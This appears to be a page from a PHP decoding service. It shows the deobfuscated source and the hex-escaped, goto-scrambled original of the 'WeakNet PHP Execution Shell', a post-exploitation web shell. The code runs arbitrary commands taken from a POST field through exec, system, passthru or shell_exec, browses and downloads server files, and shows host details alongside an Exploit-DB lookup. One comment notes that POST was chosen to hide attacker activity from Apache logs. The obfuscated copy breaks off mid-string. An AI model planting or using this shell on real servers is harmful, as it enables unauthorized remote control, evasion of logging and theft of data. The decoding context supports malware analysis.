Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto jJUJW; nJzJB: echo "\74\57\164\x64\x3c\57\x74\162\x3e\xa\x9\x9\x3c\164\162\x3e..

Decoded Output download

<?php
 goto jJUJW; nJzJB: echo "</td</tr>\xa\x9\x9<tr><td>Software</td><td>"; goto M5InE; J1FPs: if ($_POST["execType"] == "exec") { goto QMN8g; } goto qsg8v; Rhfd0: echo "<!-- This is where the outpu of the command goes -->
<div class="output">\xa"; goto ZxxW_; ZhqaP: header("Pragma: public"); goto k8Hx2; SmhME: echo "" name="execType" id="execType"/>
	\x9<button type="button" onClick="saveFile();">Download File</button>
	</form><!-- went with POST method to slightly obfuscate the attacker's activity from simple Apache logs -->\xa<!-- The band name on the bottom left -->\xa<div class="branding">
	<a href="https://github.com/weaknetlabs/wpes">&#128026; WPES WeakNet Labs</a>
</div>\xa<!-- The Server info box -->\xa<div class="serverInfo">\xa\x9<table>\xa\x9\x9<tr><strong style="font-size:16px;">&#128225; Remote Server Information &#128225;</strong></tr>
\x9	<tr><td>IP</td><td>"; goto np0JY; CwJ8v: hMMqe: goto j1NhP; fGMeL: header("Content-Disposition: attachment; filename="" . basename($rFjMr) . ".txt""); goto ECltG; uibyl: goto E9_2n; goto iB5q8; m9yYz: if (!($_POST["execType"] == "passthru")) { goto fw3bM; } goto sqayN; gy19t: exec("{$QnnlO} 2>/dev/stdout", $pi11W); goto jxKjS; UusmY: echo "<script>\xa\x9// this is seemingly randomly placement, but I am using PHP to write the file contents that I need to retrieve first
	function saveFile(){
		window.open('data:text/plain;charset=utf-8,' + escape('"; goto RM3nE; M5InE: echo "<a target="blank" title="Check for exploits for this software using Exploit-DB." href="https://www.exploit-db.com/search/?action=search&description=" . $jOfZ3 . "&e_author=">" . $_SERVER["SERVER_SOFTWARE"] . "</a>"; goto ii57X; Zw4jE: echo "<a target="_blank" title="Email administrator." href="mailto:" . $_SERVER["SERVER_ADMIN"] . "">" . $_SERVER["SERVER_ADMIN"] . "</a>"; goto aBNcI; lI0eE: header("Content-Type: application/octet-stream"); goto fGMeL; O2MOk: $jOfZ3 = preg_replace("/\//", "%20", $_SERVER["SERVER_SOFTWARE"]); goto TQRS8; qsg8v: if ($_POST["execType"] == "system") { goto wK4_Y; } goto wy9Er; KqHlb: InIpx: goto TiaAF; Bs0Xb: $rFjMr = $jNBbj . $ZpVfW; goto EODje; jJUJW: echo "<!DOCTYPE html>
<html>\xa<!--\xa\x9WeakNet PHP Execution Shell - Post-exploitation shell for convenience\xa\x9with navigation, and file content showing capabilities
\x9version 0.2\xa	2015 - Written by Douglas [email protected]\xa-->\xa<head>\xa<title>Weakerthan PHP Exec Shell - 2015 WeakNet Labs</title>
<style>\xa	html{ /* global styling */\xa		font-family:"Open Sans", sans-serif;\xa		background-color:#3c3c3c;\xa\x9	color:#729fcf;
\x9}\xa	.inputCMD{ /* input parent box at the bottom */
		border-top:3px solid #666;\xa	\x9position:fixed;
\x9	bottom:0px;\xa\x9	left:0px;\xa		width:100%;
\x9	padding:20px 0px 20px 10px;
\x9	background:#262626;\xa\x9}
	.cmdTitle{ /* a simple span to differentiate the command from the title */\xa		font-size:14px;
		color:yellow;\xa\x9	font-family:monospace;
\x9}\xa\x9input[type=text]{ /* making input look a bit more modern */\xa	\x9font-size:15px;\xa	\x9background-color:#353535;
	\x9color:yellow;\xa\x9	padding:10px;
	\x9border:2px solid #2e2e2e;\xa		float:left;\xa	\x9margin:5px 0px 0px 0px;
	\x9transition-property: background-color;
		transition-duration: 2s;\xa\x9}\xa	input[type=text]:hover{ /* making input look a bit more modern */\xa	\x9background-color:#545454;\xa	}\xa	.titleBar{ /* this parent div is positioned */
		position:fixed; 
\x9\x9top:0px;
	\x9left:0px;\xa	\x9width:100%;\xa	\x9height:50px;\xa\x9\x9background:#2a2a2a;\xa\x9\x9border-bottom:3px solid #666;
\x9	padding-bottom:5px;
\x9}
	.title{ /* this div is to vertically center the child, titleCenter */\xa		display: table-cell;\xa\x9	vertical-align: middle;\xa		padding:10px 0px 10px 10px;
\x9}\xa\x9.titleCenter{ /* vertically centered in middle of ".title" */\xa\x9\x9height:25px;\xa	\x9margin:auto;\xa\x9\x9display: inline-block;\xa	}
\x9.output{ /* command output box with scolled overlfow */
\x9\x9font-family: monospace;
	\x9font-size:14px;\xa	\x9margin:70px 0px 0px 0px;
		overflow:scrolled;\xa	\x9padding: 5px 5px 150px 5px; /* to show command output behind the inputCMD bar */
\x9	color:#ccc;\xa	\x9background-color:#565656;
\x9\x9width:74%;\xa	}\xa	.unicode{ /* display a pointer on hover */\xa	\x9cursor:pointer;
	}\xa	.serverInfo{ /* for small box on top right for server information */
\x9	border:2px solid #666;\xa\x9\x9position:fixed;\xa\x9\x9top:10px;
	\x9right:10px;\xa\x9	z-index:1337;
\x9\x9background:#2e2e2e;\xa		color:#729fcf;
\x9	padding:5px;\xa\x9	font-size:14px;
\x9}
	.branding{ /* for a link to the GitHUB page */\xa		float:right;\xa		font-size:15px;
	\x9margin-right:20px;
	\x9height:40px; /* because of padding t,b of inputCMD */
\x9}
	a{ /* why can't this be non hideous by default? */\xa\x9	text-decoration:none;\xa\x9\x9color:#729fcf;\xa	}\xa\x9a:hover{\xa	\x9text-decoration:underline; /* to differentiate, i guess */
	}\xa\x9button{
\x9	margin:5px 0px 0px 10px;
\x9\x9color:#729fcf;\xa		padding:10px;\xa	\x9background-color:#353535;\xa		border:2px solid #2e2e2e;\xa		float:left;
\x9	transition-property: background-color;
		transition-duration: 2s;
	}\xa\x9button:hover{\xa\x9\x9background-color:#545454;
	}\xa	/* these are for styling the tbale output of the .serverInfo box: */\xa	tr:nth-child(even) {background: #202020}\xa	tr:nth-child(odd) {background: #343434}
	td{ padding:3px;}
</style>\xa<script>\xa\x9// for dynamically generating navigation from output\xa	function submitFile(path,file,action){
		if(action == "cat"){\xa\x9		document.getElementById("inputCmd").value='cat ' + path + file; // TODO change to while read foo do echo foo
\x9	}else if(action == "ls"){\xa\x9\x9\x9document.getElementById("inputCmd").value='ls -l ' + path + file; // TODO change to while read foo do echo foo\xa	\x9}
\x9\x9document.getElementById("submitCmd").submit(); // submit the request
	}\xa	function execType(type){\xa\x9\x9document.getElementById('execType').value=type; // Just set the type here and the PHP POST will pick it up
	}\xa</script>
</head>\xa<body>
"; goto QddJu; cAdxa: echo "	\x9\x9type="radio" name="execType" value="passthru" />\xa		<a href="http://php.net/manual/en/function.shell-exec.php">shell_exec()</a><input onClick="execType('shell_exec')" "; goto ec1DQ; lVpNu: QMN8g: goto gy19t; sOtUh: echo "	\x9</td</tr>
		"; goto O2MOk; TcygK: echo "\x9\x9	type="radio" name="execType" value="shell_exec" /><br />
	<form action="#" method="post" name="submitCmd" id="submitCmd"><!-- no button here, just hit enter -->\xa\x9	<input id="inputCmd" type="text" size="55" placeholder="Type command here to execute on host and hit return" name="cmd"/>\xa\x9	<input type="hidden" value=""; goto i3QgK; Y8P3y: readfile($rFjMr); goto KK4ov; Z6EU2: header("Content-Description: File Transfer"); goto lI0eE; Erfr3: echo "checked"; goto rYPDe; H_Z0D: xD1fF: goto UDiKn; B9NPY: echo "checked"; goto GwPPJ; Ch1mI: E9_2n: goto UusmY; M_jKD: n2MX8: goto SmhME; ExDHw: goto zbYxG; goto XtXaw; ec1DQ: if (!$_POST["execType"]) { goto mOSkw; } goto dpsra; VnmpW: zaEtt: goto Ch1mI; EODje: if (!file_exists($rFjMr)) { goto H1oOv; } goto Z6EU2; AL7kn: LDSLB: goto Tz9yr; biZOl: passthru("{$QnnlO} 2>/dev/stdout", $pi11W); goto clRxb; Urfp9: mOSkw: goto TcygK; ECltG: header("Expires: 0"); goto S6AAl; j1NhP: echo "checked"; goto KqHlb; QddJu: if (!$_POST["cmd"]) { goto C84rx; } goto V6oNr; TiaAF: echo " 
\x9\x9\x9name="execType" value="exec" onClick="execType('exec')"/> \xa	\x9<a href="http://php.net/manual/en/function.system.php">system()</a><input onClick="execType('system')" "; goto n03ZB; dpsra: if (!($_POST["execType"] == "shell_exec")) { goto WlJk8; } goto Erfr3; EETse: CmKEN: goto x2BXK; RM3nE: $dXr9q = preg_replace("/(\(|\)|$|')/", "$1", $pMBo9); goto C2hO0; JH8Pc: echo "<a target="blank" href="https://www.google.com/?gws_rd=ssl#q=site:" . $_SERVER["SERVER_NAME"] . "">" . $_SERVER["SERVER_NAME"] . "</a>"; goto nJzJB; pzUzt: foreach (array_slice($pi11W, 1, count($pi11W)) as $T8ybf) { goto xQ9kO; to1R0: $T8ybf = preg_replace("/</", "&lt;", $T8ybf); goto pMlT5; GTuS6: if (preg_match("/^ls -l\s/", "{$QnnlO}")) { goto Z3old; } goto u3Bxs; pMlT5: $T8ybf = preg_replace("/\s/", "&nbsp;", $T8ybf); goto GTuS6; k4o0N: echo "<span style="color:#00ce05" title="Click here to view directory contents" class="unicode" onClick="submitFile('{$jNBbj}','{$ZpVfW}','ls');">&#128269;</span>&nbsp;" . $T8ybf . "<br />"; goto D4vjX; cKTFl: W72eX: goto O6U9o; TYNWI: qkmbT: goto XF7Ae; XF7Ae: $T8ybf = preg_replace("/&/", "&amp;", $T8ybf); goto to1R0; O6U9o: Tp8gw: goto BI4DS; iHRGl: if (!preg_match("/^d/", "{$T8ybf}")) { goto wPRjX; } goto k4o0N; D4vjX: goto W72eX; goto tNgrZ; tNgrZ: wPRjX: goto yQnLf; vHeLE: $ZpVfW = array_pop($ujY8P); goto fzi_c; ze59l: goto Tp8gw; goto oBlHp; uCfCl: if (preg_match("/\/$/", "{$jNBbj}")) { goto qkmbT; } goto ye9E5; yQnLf: echo "<span style="color:yellow" title="Click here view file contents" class="unicode" onClick="submitFile('{$jNBbj}','{$ZpVfW}','cat');">&#128049;</span>&nbsp;" . $T8ybf . "<br />"; goto cKTFl; T0POK: $ujY8P = explode(" ", $T8ybf); goto vHeLE; u3Bxs: echo $T8ybf . "<br />"; goto ze59l; xQ9kO: $pMBo9 = implode("\n", $pi11W); goto T0POK; fzi_c: $jNBbj = preg_replace("/.*\s([^ ]+)$/", "$1", "{$QnnlO}"); goto uCfCl; oBlHp: Z3old: goto iHRGl; BI4DS: jIbdj: goto dGPsF; ye9E5: $jNBbj .= "/"; goto TYNWI; dGPsF: } goto VnmpW; AEkdA: if (!$_POST["downloadFile"]) { goto XrhVR; } goto N_3_Y; wfLmF: XrhVR: goto RAqjQ; XpFkA: goto i82iw; goto lVpNu; iY6iB: zbYxG: goto O_77E; jxKjS: goto i82iw; goto N7Aqj; I1bTj: echo "checked"; goto AL7kn; UDiKn: $pi11W = shell_exec("{$QnnlO} 2>/dev/stdout"); goto UUn8s; Ddd38: if (!($_POST["execType"] == "exec")) { goto LDSLB; } goto I1bTj; RAqjQ: echo "</div>
<!-- The input box and whole bottom bar -->
<div class="inputCMD">
	<strong>PHP Exec Function: </strong> \xa\x9\x9<a href="http://php.net/manual/en/function.exec.php">exec()</a><input type="radio" "; goto Xb172; k8Hx2: header("Content-Length: " . filesize($rFjMr)); goto Y8P3y; Cnum_: $QnnlO = "(none) Please type a command to execute below"; goto LM1ys; i3QgK: if ($_POST["execType"] != '') { goto CmKEN; } goto FdY5M; sfOdL: LzD_v: goto wfLmF; JUPCK: echo "</td</tr>\xa\x9\x9<tr><td>Admin</td><td>"; goto Zw4jE; O_77E: echo "<div class="titleBar"><div class="title"><div class="titleCenter"><span style="font-size:35px;">&#128026; WPES</span> Displaying results for command: " . " <span class="cmdTitle">" . $QnnlO . "</span></div></div></div>"; goto Rhfd0; LM1ys: $T8ybf = "WeakNet Post-Exploitation PHP Execution Shell is free, redistributable software. It has no warranty for the program, " . "to the extent permitted by applicable law. WeakNet Laboratories is no liable to you for damages, including any general," . " special, incidental or consequential damages arising out of the use or inability to use the program. <br /><br />This" . " program should only be used on systems that the penetration tester has permission to use or owns." . "<br /><br />To begin, please type a command below. For help please refer to the GitHUB Readme.md file by clicking on the" . " link on the bottom left. Thank you for choosing WeakNet Labs!"; goto iY6iB; Xb172: if (!$_POST["execType"]) { goto hMMqe; } goto Ddd38; N7Aqj: wK4_Y: goto lEfk5; HX4rW: echo $_SERVER["REQUEST_TIME"]; goto JUPCK; Irmfz: echo " 
\x9\x9	type="radio" name="execType" value="system" /> \xa\x9\x9<a href="http://php.net/manual/en/function.passthru.php">passthru()</a><input onClick="execType('passthru')" "; goto AarRu; GwPPJ: DHsNG: goto CuUZ2; sqayN: echo "checked"; goto Ktdz5; ii57X: echo "</td</tr>\xa	\x9<tr><td>Timestamp</td><td>"; goto HX4rW; rYPDe: WlJk8: goto Urfp9; Tz9yr: goto InIpx; goto CwJ8v; FdY5M: echo "exec"; goto leSe2; np0JY: echo "<a title="Check ARIN database for this IP address information." target="_blank" href="http://whois.arin.net/rest/nets;q=" . $_SERVER["SERVER_ADDR"] . "?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2">" . $_SERVER["SERVER_ADDR"] . "</a>"; goto sOtUh; iB5q8: bscyG: goto pzUzt; S6AAl: header("Cache-Control: must-revalidate"); goto ZhqaP; AarRu: if (!$_POST["execType"]) { goto yQbX8; } goto m9yYz; XtXaw: C84rx: goto Cnum_; Lmn8c: echo "'));\xa	}\xa</script>
<!-- Download the file -->
"; goto AEkdA; clRxb: goto i82iw; goto H_Z0D; wy9Er: if ($_POST["execType"] == "passthru") { goto xXqGT; } goto iJ5G_; bJAJD: goto i82iw; goto Q715u; Ktdz5: fw3bM: goto hCCIj; C2hO0: echo $dXr9q; goto Lmn8c; iJ5G_: if ($_POST["execType"] == "shell_exec") { goto xD1fF; } goto XpFkA; zVrVp: if (!($_POST["execType"] == "system")) { goto DHsNG; } goto B9NPY; N_3_Y: if (!($_POST["downloadFile"] == 1)) { goto LzD_v; } goto Bs0Xb; TQRS8: $jOfZ3 = preg_replace("/\([^)]+\)/", '', $jOfZ3); goto jQJeL; leSe2: goto n2MX8; goto EETse; V6oNr: $QnnlO = $_POST["cmd"]; goto J1FPs; hCCIj: yQbX8: goto cAdxa; ZxxW_: if ($_POST["cmd"]) { goto bscyG; } goto MEjCP; UUn8s: i82iw: goto ExDHw; CuUZ2: IybDX: goto Irmfz; lEfk5: system("{$QnnlO} 2>/dev/stdout", $pi11W); goto bJAJD; n03ZB: if (!$_POST["execType"]) { goto IybDX; } goto zVrVp; jQJeL: echo "	\x9<tr><td>Hostname</td><td>"; goto JH8Pc; Q715u: xXqGT: goto biZOl; KK4ov: H1oOv: goto sfOdL; MEjCP: echo $T8ybf . "<br />"; goto uibyl; x2BXK: echo $_POST["execType"]; goto M_jKD; aBNcI: echo "</td</tr>
\x9</table>\xa</div>
</body>\xa</html>\xaStatus API Training Shop Blog About Pricing\xa\302\251 2015 GitHub, Inc. Terms Privacy Security Contact Help
"; ?>

Did this file decode correctly?

Original Code

<?php
 goto jJUJW; nJzJB: echo "\74\57\164\x64\x3c\57\x74\162\x3e\xa\x9\x9\x3c\164\162\x3e\x3c\164\144\76\x53\x6f\x66\x74\167\x61\x72\145\74\x2f\164\144\x3e\74\x74\x64\x3e"; goto M5InE; J1FPs: if ($_POST["\x65\x78\145\143\124\171\x70\x65"] == "\x65\170\145\x63") { goto QMN8g; } goto qsg8v; Rhfd0: echo "\x3c\x21\55\55\40\x54\x68\x69\x73\40\x69\x73\x20\167\x68\x65\x72\145\x20\164\x68\x65\x20\x6f\x75\x74\x70\165\40\157\x66\x20\x74\150\x65\40\143\157\155\x6d\141\156\144\x20\x67\157\x65\163\40\55\x2d\76\12\x3c\x64\x69\x76\40\143\x6c\x61\163\x73\x3d\x22\157\165\164\160\165\164\42\76\xa"; goto ZxxW_; ZhqaP: header("\x50\162\x61\147\x6d\x61\72\40\160\x75\x62\154\151\143"); goto k8Hx2; SmhME: echo "\x22\x20\x6e\141\x6d\x65\75\x22\145\170\145\143\124\x79\x70\x65\x22\40\151\x64\x3d\x22\x65\x78\145\x63\x54\x79\160\x65\42\57\x3e\12\11\x9\x3c\x62\165\x74\x74\157\156\40\x74\171\x70\145\x3d\42\x62\x75\164\164\x6f\x6e\x22\40\x6f\156\x43\154\151\143\153\x3d\x22\163\x61\x76\145\106\x69\154\145\50\x29\x3b\x22\x3e\x44\157\167\156\154\157\x61\144\40\x46\151\x6c\145\x3c\57\142\165\164\x74\157\x6e\76\12\11\x3c\57\146\x6f\162\x6d\x3e\74\41\x2d\x2d\40\167\145\x6e\x74\40\167\x69\164\150\40\x50\117\123\124\x20\155\x65\164\150\157\x64\40\164\157\40\163\154\151\147\150\x74\x6c\x79\x20\x6f\x62\x66\x75\163\x63\x61\x74\x65\40\x74\x68\145\x20\x61\164\164\141\x63\x6b\145\x72\47\163\x20\141\x63\x74\151\166\x69\164\x79\x20\x66\162\157\x6d\40\x73\x69\x6d\160\154\x65\x20\101\160\141\143\150\x65\40\x6c\x6f\147\x73\40\x2d\55\x3e\xa\74\41\x2d\55\x20\124\x68\x65\40\x62\141\156\144\x20\156\x61\155\145\x20\157\156\x20\x74\x68\x65\x20\142\157\x74\x74\157\155\40\x6c\145\146\164\40\55\x2d\x3e\xa\x3c\x64\x69\166\40\143\154\x61\x73\x73\75\42\x62\x72\141\156\x64\x69\x6e\x67\x22\x3e\12\11\74\141\x20\x68\162\x65\x66\75\x22\x68\x74\164\x70\x73\x3a\x2f\57\147\151\x74\x68\x75\142\56\x63\157\155\x2f\x77\x65\x61\153\x6e\145\x74\154\141\x62\163\57\167\160\x65\163\x22\76\46\x23\x31\62\70\60\x32\66\73\x20\127\120\105\123\x20\x57\x65\x61\153\x4e\x65\164\40\x4c\x61\x62\x73\x3c\57\x61\76\12\x3c\x2f\144\151\x76\x3e\xa\74\41\55\x2d\40\124\x68\x65\40\x53\x65\162\x76\x65\x72\x20\151\156\x66\x6f\x20\x62\157\170\40\55\55\x3e\xa\x3c\144\x69\166\40\143\154\x61\163\163\75\42\x73\145\162\x76\x65\x72\x49\156\x66\x6f\42\x3e\xa\x9\74\164\x61\x62\154\145\76\xa\x9\x9\x3c\164\x72\x3e\74\x73\x74\x72\157\x6e\x67\40\x73\x74\x79\x6c\145\75\x22\146\157\156\x74\55\x73\151\172\145\x3a\x31\x36\x70\x78\73\x22\76\46\x23\61\x32\70\62\x32\65\x3b\40\122\145\x6d\x6f\x74\x65\40\x53\x65\162\x76\x65\x72\40\111\156\146\157\162\x6d\x61\164\151\157\x6e\40\46\43\61\62\70\x32\x32\x35\73\x3c\x2f\163\x74\162\x6f\156\x67\76\x3c\x2f\164\162\x3e\12\x9\11\74\164\162\x3e\x3c\x74\144\76\x49\120\x3c\x2f\164\x64\x3e\74\164\x64\x3e"; goto np0JY; CwJ8v: hMMqe: goto j1NhP; fGMeL: header("\x43\x6f\156\x74\x65\156\164\55\x44\151\163\x70\x6f\x73\151\x74\151\157\x6e\x3a\x20\x61\164\164\x61\143\x68\x6d\145\156\164\73\40\146\151\x6c\145\156\141\155\x65\x3d\42" . basename($rFjMr) . "\56\x74\170\164\x22"); goto ECltG; uibyl: goto E9_2n; goto iB5q8; m9yYz: if (!($_POST["\145\x78\x65\x63\124\171\x70\x65"] == "\160\x61\x73\163\x74\150\162\165")) { goto fw3bM; } goto sqayN; gy19t: exec("{$QnnlO}\x20\x32\x3e\x2f\144\x65\166\57\x73\164\144\x6f\x75\164", $pi11W); goto jxKjS; UusmY: echo "\x3c\x73\x63\162\x69\x70\164\x3e\xa\x9\57\57\40\x74\150\x69\163\x20\151\x73\x20\x73\x65\145\155\151\156\x67\x6c\x79\x20\162\141\156\x64\x6f\155\154\171\x20\x70\154\x61\143\x65\155\145\156\164\54\40\142\x75\x74\40\x49\40\141\155\x20\x75\x73\151\x6e\x67\40\x50\110\x50\40\x74\157\x20\167\162\x69\x74\145\x20\x74\150\x65\40\x66\151\154\x65\40\x63\x6f\x6e\x74\x65\x6e\164\x73\x20\x74\150\141\x74\40\111\40\156\145\x65\x64\40\164\157\x20\x72\145\x74\x72\x69\145\166\x65\40\x66\x69\162\x73\x74\12\11\x66\165\156\143\164\x69\x6f\156\40\163\141\166\145\106\151\154\145\50\51\x7b\12\11\11\x77\x69\156\144\x6f\x77\x2e\157\x70\145\x6e\50\47\x64\141\164\x61\x3a\164\145\x78\x74\57\x70\x6c\x61\151\156\73\x63\x68\x61\x72\x73\x65\164\75\x75\164\x66\x2d\x38\x2c\x27\x20\x2b\x20\145\163\x63\141\x70\145\x28\47"; goto RM3nE; M5InE: echo "\74\141\x20\x74\x61\162\x67\145\x74\75\42\x62\154\x61\x6e\x6b\x22\x20\164\x69\x74\154\145\x3d\42\103\x68\x65\143\153\40\x66\157\162\x20\x65\170\160\x6c\x6f\151\x74\x73\40\x66\157\162\40\x74\x68\151\163\40\x73\157\146\x74\167\141\x72\x65\40\165\x73\151\x6e\x67\40\105\170\x70\x6c\x6f\x69\x74\55\x44\102\x2e\42\40\150\x72\145\x66\75\42\150\x74\164\x70\x73\72\57\x2f\167\x77\167\x2e\x65\170\x70\154\x6f\x69\164\55\x64\142\56\x63\157\x6d\x2f\x73\145\x61\x72\143\150\57\77\x61\143\164\x69\157\x6e\x3d\163\145\x61\x72\x63\150\x26\x64\145\163\x63\162\x69\x70\164\151\x6f\x6e\75" . $jOfZ3 . "\46\x65\137\x61\165\x74\150\x6f\162\x3d\x22\76" . $_SERVER["\123\x45\x52\x56\x45\x52\137\123\117\x46\124\x57\x41\122\x45"] . "\74\57\141\76"; goto ii57X; Zw4jE: echo "\x3c\141\x20\x74\x61\162\147\145\x74\75\x22\x5f\x62\154\141\156\153\42\40\164\x69\164\x6c\x65\75\x22\x45\155\141\151\x6c\40\x61\x64\x6d\151\x6e\151\163\x74\x72\x61\x74\157\162\56\x22\40\150\162\145\x66\75\42\155\141\x69\x6c\x74\x6f\x3a" . $_SERVER["\x53\105\x52\126\105\122\137\101\104\115\x49\x4e"] . "\x22\76" . $_SERVER["\x53\x45\x52\126\x45\x52\137\101\104\x4d\111\116"] . "\x3c\x2f\141\76"; goto aBNcI; lI0eE: header("\103\157\x6e\164\145\156\x74\55\x54\x79\x70\145\72\x20\x61\x70\x70\154\x69\143\x61\x74\x69\x6f\156\x2f\157\143\164\145\164\55\163\x74\162\x65\x61\155"); goto fGMeL; O2MOk: $jOfZ3 = preg_replace("\57\x5c\x2f\x2f", "\45\62\60", $_SERVER["\x53\x45\x52\x56\105\x52\137\x53\117\106\x54\127\x41\122\105"]); goto TQRS8; qsg8v: if ($_POST["\145\x78\145\x63\x54\171\x70\x65"] == "\x73\x79\x73\x74\x65\155") { goto wK4_Y; } goto wy9Er; KqHlb: InIpx: goto TiaAF; Bs0Xb: $rFjMr = $jNBbj . $ZpVfW; goto EODje; jJUJW: echo "\74\x21\104\x4f\103\x54\131\120\x45\40\150\164\x6d\154\76\12\x3c\x68\x74\155\154\x3e\xa\74\x21\55\55\xa\x9\x57\x65\x61\153\116\145\x74\x20\x50\x48\x50\40\x45\170\x65\143\165\164\x69\157\x6e\x20\x53\x68\x65\154\154\x20\x2d\40\120\x6f\163\x74\x2d\x65\170\x70\x6c\x6f\x69\164\x61\x74\x69\157\156\x20\x73\150\145\154\154\40\x66\x6f\x72\x20\143\x6f\x6e\x76\x65\x6e\x69\x65\x6e\x63\x65\xa\x9\167\151\164\x68\40\156\x61\166\151\147\141\164\x69\x6f\156\54\40\x61\x6e\144\40\x66\151\154\145\40\x63\x6f\x6e\x74\x65\156\164\40\163\x68\x6f\x77\x69\x6e\x67\40\x63\x61\160\141\x62\151\x6c\x69\x74\151\x65\x73\12\x9\166\x65\162\x73\151\157\x6e\x20\x30\56\x32\xa\11\x32\60\61\65\x20\x2d\x20\x57\162\x69\x74\164\145\156\40\142\171\x20\x44\157\x75\x67\154\141\x73\40\127\x65\x61\x6b\116\x65\x74\x4c\141\x62\x73\100\107\155\141\x69\154\x2e\x63\x6f\x6d\xa\55\x2d\76\xa\x3c\x68\x65\x61\144\76\xa\x3c\164\151\x74\154\145\76\127\x65\141\x6b\145\x72\x74\150\141\156\40\120\x48\x50\40\x45\170\x65\143\x20\123\x68\145\x6c\154\40\55\40\x32\60\x31\65\x20\x57\x65\x61\x6b\x4e\x65\164\x20\x4c\141\x62\x73\74\x2f\164\x69\164\154\x65\x3e\12\x3c\x73\164\x79\x6c\145\76\xa\11\150\164\155\154\173\40\57\x2a\40\x67\x6c\157\x62\141\154\40\163\x74\x79\x6c\x69\156\147\40\52\x2f\xa\11\11\146\x6f\x6e\x74\x2d\146\x61\x6d\x69\x6c\171\x3a\42\x4f\x70\x65\x6e\40\x53\x61\156\x73\x22\x2c\x20\x73\141\156\x73\x2d\x73\x65\162\x69\146\73\xa\11\11\x62\x61\x63\153\x67\162\157\165\156\144\55\143\x6f\x6c\157\162\x3a\x23\x33\143\x33\x63\63\x63\x3b\xa\x9\11\143\x6f\154\x6f\162\x3a\43\x37\x32\71\x66\x63\146\73\12\x9\x7d\xa\11\56\151\156\160\165\x74\103\x4d\104\173\40\x2f\52\40\151\x6e\x70\x75\164\x20\160\141\162\x65\x6e\164\x20\142\x6f\170\x20\x61\164\x20\164\150\145\x20\x62\157\x74\x74\x6f\x6d\x20\52\57\12\11\11\142\157\162\144\145\162\55\164\157\x70\72\63\160\170\x20\x73\157\154\151\144\40\x23\x36\x36\66\73\xa\11\x9\x70\x6f\163\x69\x74\151\x6f\156\x3a\x66\151\x78\x65\x64\x3b\12\x9\11\x62\x6f\164\x74\x6f\x6d\72\x30\x70\170\73\xa\x9\11\154\x65\x66\x74\72\x30\x70\170\x3b\xa\11\11\x77\151\144\x74\150\x3a\x31\60\60\45\73\12\x9\11\160\x61\144\144\151\x6e\147\x3a\x32\x30\160\x78\x20\60\x70\x78\x20\62\60\x70\x78\x20\x31\x30\160\x78\x3b\12\x9\11\x62\x61\x63\x6b\147\x72\157\165\x6e\x64\x3a\43\x32\x36\62\x36\62\x36\x3b\xa\x9\175\12\11\56\x63\x6d\144\124\x69\x74\x6c\145\x7b\x20\x2f\52\40\x61\x20\x73\151\x6d\x70\x6c\x65\x20\163\x70\x61\156\x20\164\x6f\40\144\151\x66\x66\x65\x72\145\x6e\164\151\141\164\145\40\164\150\x65\x20\x63\157\155\155\x61\156\144\x20\146\162\157\155\x20\x74\x68\x65\x20\x74\151\x74\154\x65\x20\52\57\xa\11\11\146\157\156\164\55\x73\x69\x7a\145\x3a\61\64\160\x78\73\12\11\11\x63\157\154\157\x72\x3a\171\145\154\x6c\157\167\x3b\xa\x9\11\146\157\x6e\x74\55\146\141\155\x69\x6c\x79\72\155\x6f\156\x6f\x73\160\x61\x63\145\73\12\x9\x7d\xa\x9\x69\x6e\160\165\164\x5b\164\171\160\x65\75\x74\x65\x78\164\x5d\173\40\x2f\52\40\x6d\x61\153\x69\x6e\x67\40\151\x6e\160\165\164\40\154\157\x6f\x6b\x20\141\40\x62\151\164\x20\155\157\162\x65\40\155\157\x64\x65\162\x6e\x20\x2a\57\xa\11\x9\x66\x6f\156\164\55\163\x69\172\145\72\61\65\x70\x78\x3b\xa\11\x9\142\141\143\x6b\x67\x72\x6f\x75\x6e\x64\55\x63\157\x6c\157\162\72\x23\x33\65\63\65\63\x35\73\12\11\x9\x63\x6f\154\157\162\72\x79\x65\154\x6c\157\167\x3b\xa\x9\11\160\141\144\x64\151\156\147\72\61\60\160\x78\73\12\11\x9\142\x6f\162\144\145\x72\x3a\x32\160\x78\40\x73\x6f\154\151\144\x20\43\62\145\62\x65\x32\145\x3b\xa\11\11\146\154\157\141\x74\72\154\x65\x66\x74\x3b\xa\11\x9\x6d\x61\x72\x67\x69\x6e\x3a\x35\x70\170\40\x30\160\x78\40\x30\x70\170\40\60\160\x78\x3b\12\11\x9\x74\x72\x61\x6e\x73\151\164\x69\157\x6e\x2d\x70\162\157\160\x65\x72\164\171\72\40\142\x61\143\153\147\162\x6f\165\156\x64\55\x63\157\154\x6f\x72\73\12\11\11\164\x72\141\x6e\163\151\x74\151\157\156\55\144\x75\x72\x61\x74\151\157\x6e\72\x20\x32\163\x3b\xa\x9\175\xa\11\x69\x6e\x70\x75\x74\x5b\x74\171\x70\145\x3d\x74\x65\170\164\x5d\x3a\x68\157\x76\145\x72\173\40\x2f\x2a\40\x6d\x61\x6b\x69\x6e\x67\x20\x69\x6e\160\x75\164\40\154\157\157\153\40\141\40\x62\151\x74\x20\x6d\157\162\x65\40\155\x6f\x64\x65\162\x6e\x20\x2a\57\xa\11\x9\142\x61\x63\153\147\x72\157\x75\x6e\x64\x2d\143\x6f\154\157\162\72\43\x35\x34\65\64\65\64\73\xa\11\175\xa\11\x2e\164\151\x74\x6c\145\x42\141\162\173\x20\57\x2a\40\x74\x68\151\163\x20\160\141\162\145\x6e\164\x20\x64\x69\x76\40\x69\x73\40\x70\157\x73\151\164\x69\x6f\x6e\145\x64\40\52\57\12\11\11\x70\x6f\163\151\x74\x69\x6f\x6e\x3a\146\151\x78\145\144\x3b\40\12\x9\x9\164\x6f\x70\72\x30\x70\170\73\12\11\x9\154\x65\x66\164\x3a\60\x70\170\x3b\xa\11\x9\x77\x69\x64\164\x68\72\x31\x30\60\45\73\xa\11\x9\x68\x65\151\x67\150\x74\72\x35\x30\160\170\x3b\xa\x9\x9\x62\x61\x63\x6b\147\x72\x6f\165\156\144\x3a\x23\x32\x61\62\141\62\141\73\xa\x9\x9\142\x6f\162\x64\145\162\55\142\157\164\164\157\x6d\x3a\63\160\170\40\x73\x6f\154\x69\x64\x20\x23\66\66\x36\x3b\12\x9\11\160\141\144\x64\x69\156\147\55\142\x6f\x74\164\x6f\x6d\x3a\65\x70\170\73\12\x9\175\12\11\x2e\164\151\164\154\145\173\x20\x2f\x2a\x20\164\150\x69\x73\40\144\x69\x76\40\x69\163\